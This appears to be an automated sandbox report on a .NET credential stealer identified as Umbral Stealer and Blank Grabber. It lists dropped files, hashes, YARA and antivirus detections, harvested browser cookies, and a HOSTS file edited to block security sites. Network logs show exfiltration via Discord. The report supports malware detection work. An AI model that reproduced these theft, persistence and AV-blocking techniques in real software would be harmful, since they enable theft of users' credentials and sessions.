  https://hamilton.cmail20.com/t/r-e-tdtrkhul-niyflludj-b/ | Get hash | malicious | Unknown | Browse | Context: 162.159.138.232
  009347280261.AWB.PEK.CO.227.20200508.240751.20200507.230805.22162.exe | Get hash | malicious | Snake Keylogger | Browse | Context: 162.159.138.232
  http://lmctgiveaway.com | Get hash | malicious | Unknown | Browse | Context: 162.159.138.232
  SOF Documents PDF.exe | Get hash | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | Browse | Context: 162.159.138.232
                                            No context
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):235008
                                            Entropy (8bit):6.051659594908541
                                            Encrypted:false
                                            SSDEEP:6144:dloZM3fsXtioRkts/cnnK6cMlpGZ7lTwk7tiTlwsJtSb8e1mdi:/oZ1tlRk83MlpGZ7lTwk7tiTlwsJIH
                                            MD5:AE3713305401315A3B520E84FB786FE5
                                            SHA1:914BD258C204E4CDDAB9DC0DBFB9C7134659AD57
                                            SHA-256:0933217D8EA84D9341154ECC34A3F231CF2FF0E70D67DBE190265C7E26B96CFB
                                            SHA-512:AE29D0C4C9106DCFBD4A212968D7D8B87236C2F39CE37435D3A658FE1B42875E44CC65C98F818391A8051312811B51DA747EFEF5FA347F3A053B58454BD1E155
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, Author: Joe Security
                                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, Author: Joe Security
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\NcIxl.scr, Author: ditekSHen
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 82%
                                            • Antivirus: Virustotal, Detection: 86%, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................H...S.......P...........................,................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1965
                                            Entropy (8bit):5.377802142292312
                                            Encrypted:false
                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                            MD5:582A844EB067319F705A5ADF155DBEB0
                                            SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                            SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                            SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.34726597513537405
                                            Encrypted:false
                                            SSDEEP:3:Nlll:Nll
                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                            Malicious:false
                                            Preview:@...e...........................................................
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.6732424250451717
                                            Encrypted:false
                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Category:dropped
                                            Size (bytes):655901
                                            Entropy (8bit):7.997824442733044
                                            Encrypted:true
                                            SSDEEP:12288:N4QsnxZuo0UBcRHuPWCN+e8q080FLW//MpjGoG/Qton:6t7nQHUtzGY/U7G4tS
                                            MD5:E757A409EB6D1A95F9D4A413630BB390
                                            SHA1:8F8ED16831D1C6595C1D187D81B986CEE9A871B4
                                            SHA-256:6F8019C825B4D4DD83FD53392B22EC75742B2DF9A7F413138082B1C0744A50DD
                                            SHA-512:0667D8FE05E58E2F3BA13C9D0E4996E9636A238F6F31E2467FF0F5D993DDD4C0D3099E4906E8DE6E4445EAC1EB32D60156899696AFC17AFE3E51B0E837AA8E6A
                                            Malicious:false
                                            Preview:PK........lS.Y.\"n....!...#...Browsers\Cookies\Chrome Cookies.txt}.Kr.0...u..(..D.]P...D.P.8T............i.:......I.o.P._:@....e.0*o....z@..... . [....B..D.....8......N.t.2....\j.8...5T_.h?$m(........?^..O.U..~NEu.>..4&.6HY.L~.....H..^?.P..1....|..i.v..|9.5.J^..*....K.q...9*....!.].Z.....R._PK........lS.YM..y....}I......Display\Display.pngl.y8.........2.D....L..d..B...J..e.E*k.!K.!d'..."DF..oa.XF.m.~.......s..?.8.......z<..".,..............d........D.>{...0...{$...y.^....8....O.yll...._~.@....p.ob.{..2+...[....k.."...\.Y3..=.....g..;"..gT,$f.HV.V...O......Vp|....gEn.<+Z.......O{4.T).S..+<.5$..5./U..n.5..{....~.M.{`..iKf..$..~..-D.j'.>%.q.D..DE....A.W..]./z........6.......'.........s...S...r0..,?..v-.c......0.^._....2!'%.m@H}.....t....C...W&H:}..-...O.........I..X..k..K...p...{..7...'&.&5..".c!u.yj..F8.a..W...z..6..)...N...f.-..i...|..?h.o...1...W.L.8.Wg}....+....V.FVO7c..-.S.......s.....Su\..=5'.......;.M...l..k&. ...-.w...)_..9...*k....w.
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.848598812124929
                                            Encrypted:false
                                            SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                            MD5:9664DAA86F8917816B588C715D97BE07
                                            SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                            SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                            SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):289
                                            Entropy (8bit):5.865375252169314
                                            Encrypted:false
                                            SSDEEP:6:Pk3rsLgxbh+3r4wyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqv5:c7JH+74xva3UhyL/8ObW0
                                            MD5:49EC633D95953041A44FF47D64F82A19
                                            SHA1:EA9BD5B1F902BBFC4EC24A7AC5E99EF72436A2F4
                                            SHA-256:3E64F1CCD635E18E72EF1A8F74640450AA7F2EC52529F28C03F473ECC5988A8F
                                            SHA-512:D6A627F441FA70A81F8D3BDBFA63DA0F111FE83EC359321EC281C7D1569382A303091693625AB3B78B1EA2FB9068DCFFAE61F13FA24C6106B1F5183442FB4DF9
                                            Malicious:false
                                            Preview:.google.com.TRUE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07...google.com.TRUE./.FALSE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA..
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):674173
                                            Entropy (8bit):7.924232456527042
                                            Encrypted:false
                                            SSDEEP:12288:Etv6+67htETHcVUGmnP0Ata923LbuaVaTVb/DUG68luun0ci6czg:EB6FIuiP/g03HuaVEdUNxY0t6Eg
                                            MD5:FD4F4C36D7FEC52F9F9BFC55C72F6BBF
                                            SHA1:5D5458AF6E349EE81CAE557C7C2733060FCB58C2
                                            SHA-256:617B4859BC3960A308660CC9DECBB4F1DCAEF8CF46BEF477E402BACBA2A93C61
                                            SHA-512:671EE082636E73F596992DE5D897686BF4040CF970F94E5CC85E61541644B1E94F361C513B342A3DC8AD9E80E0861E21CE05385F1654650415F117F5B7670EE2
                                            Malicious:false
                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..y.mU........l..2......Dq...|.G...J].5.("X..X#*R.....PD1.(...P...PJ.R....7.1.o.....j..9...1z.c...........9...dy....!.NI.h..Y.<?....C.....3..N.....'<....n.^.d!.t...........0Wl...q.~i~t...y1u\L..O...}b..Y..HL.#..H..t.....;.#.....5..?..=6i:.?:.S..;..>.25O..yx^L}....S.N..'.:.S..O<0o:...e...TS......7..........3....m...=.....D..k.~<.S.....h ..S..W.{...t..{R.<.....w.f...J..;.8..w.L......j.....bK...LY..b..........6..z..o..e...f.y.{.-U..7WK.r[..[g1..[2So.9..|...../)X...k....S.ySb...e|~.O...L...~5K.O...7...X+..7..zj....7.Z-./.........0...w....n.e..P-}c..'..b...{]_M.y]......5yN|...wK1....K...Z.j..q).T...4..zU..N.tw.:...J..XB...~m.t.tn....Rn.3.].jc+...Z.W:7..q..i.n.....;]...]........WT.......>+.......~uf.n.s........g].~...\.G..[.s:..t.N?..r=..;.|B../.L.....&......u..O.n.>...WS.\...vH.7A...em.s.a...\...b/.....Rn.?.Z/.&.muY5.u..4'.:A.<.[.C.....3.lvq....\....S.>..".
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):51200
                                            Entropy (8bit):0.8746135976761988
                                            Encrypted:false
                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.8553638852307782
                                            Encrypted:false
                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            File Type:ASCII text, with CRLF, LF line terminators
                                            Category:dropped
                                            Size (bytes):2223
                                            Entropy (8bit):4.573013811987098
                                            Encrypted:false
                                            SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                            MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                            SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                            SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                            SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                            Malicious:true
                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):6.051659594908541
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:IDLBk4XMUa.exe
                                            File size:235'008 bytes
                                            MD5:ae3713305401315a3b520e84fb786fe5
                                            SHA1:914bd258c204e4cddab9dc0dbfb9c7134659ad57
                                            SHA256:0933217d8ea84d9341154ecc34a3f231cf2ff0e70d67dbe190265c7e26b96cfb
                                            SHA512:ae29d0c4c9106dcfbd4a212968d7d8b87236c2f39ce37435d3a658fe1b42875e44cc65c98f818391a8051312811b51da747efef5fa347f3a053b58454bd1e155
                                            SSDEEP:6144:dloZM3fsXtioRkts/cnnK6cMlpGZ7lTwk7tiTlwsJtSb8e1mdi:/oZ1tlRk83MlpGZ7lTwk7tiTlwsJIH
                                            TLSH:9F346B4933B8CB17E25F8BBDD5B0548F87B1F143E90AF7CE1C8899E82411B42E949A57
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x43aa9e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                             Name | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3aa48 | 0x53 | .text
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c000 | 0x550 | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3e000 | 0xc | .reloc
                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aa2c | 0x1c | .text
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                             .text | 0x2000 | 0x38aa4 | 0x38c00 | e33b8dd2fdda32a5da99caef7d0f5cda | False | 0.3988849118942731 | data | 6.0674971746640525 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                             .rsrc | 0x3c000 | 0x550 | 0x600 | 962661cf515c57234d66775c661dfade | False | 0.4134114583333333 | data | 4.575008625258809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .reloc | 0x3e000 | 0xc | 0x200 | 0ba71f33e486e8552fc7ee8251bdd63d | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                             Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                             RT_VERSION | 0x3c0a0 | 0x2c4 | data | | | 0.4449152542372881
                                             RT_MANIFEST | 0x3c364 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                             DLL | Import
                                             mscoree.dll | _CorExeMain
                                             Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                             2024-08-05T14:58:58.214926+0200 | TCP | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             2024-08-05T14:58:38.291208+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49705 | 80 | 192.168.2.7 | 208.95.112.1
                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                             Aug 5, 2024 14:58:03.733750105 CEST | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:03.743948936 CEST | 80 | 49700 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:03.744040012 CEST | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:03.744220972 CEST | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:03.759335041 CEST | 80 | 49700 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:04.258070946 CEST | 80 | 49700 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:04.303088903 CEST | 49700 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:37.718220949 CEST | 49705 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:37.723102093 CEST | 80 | 49705 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:37.723192930 CEST | 49705 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:37.723392963 CEST | 49705 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:37.728836060 CEST | 80 | 49705 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:38.275398016 CEST | 80 | 49705 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:38.291208029 CEST | 49705 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:38.296509027 CEST | 80 | 49705 | 208.95.112.1 | 192.168.2.7
                                             Aug 5, 2024 14:58:38.296569109 CEST | 49705 | 80 | 192.168.2.7 | 208.95.112.1
                                             Aug 5, 2024 14:58:57.345340014 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:57.345362902 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.345479965 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:57.345944881 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:57.345957041 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.811517000 CEST | 443 | 49707 | 162.159.138.232 | 192.168.2.7
                                             Aug 5, 2024 14:58:57.811708927 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
                                             Aug 5, 2024 14:58:57.814182043 CEST | 49707 | 443 | 192.168.2.7 | 162.159.138.232
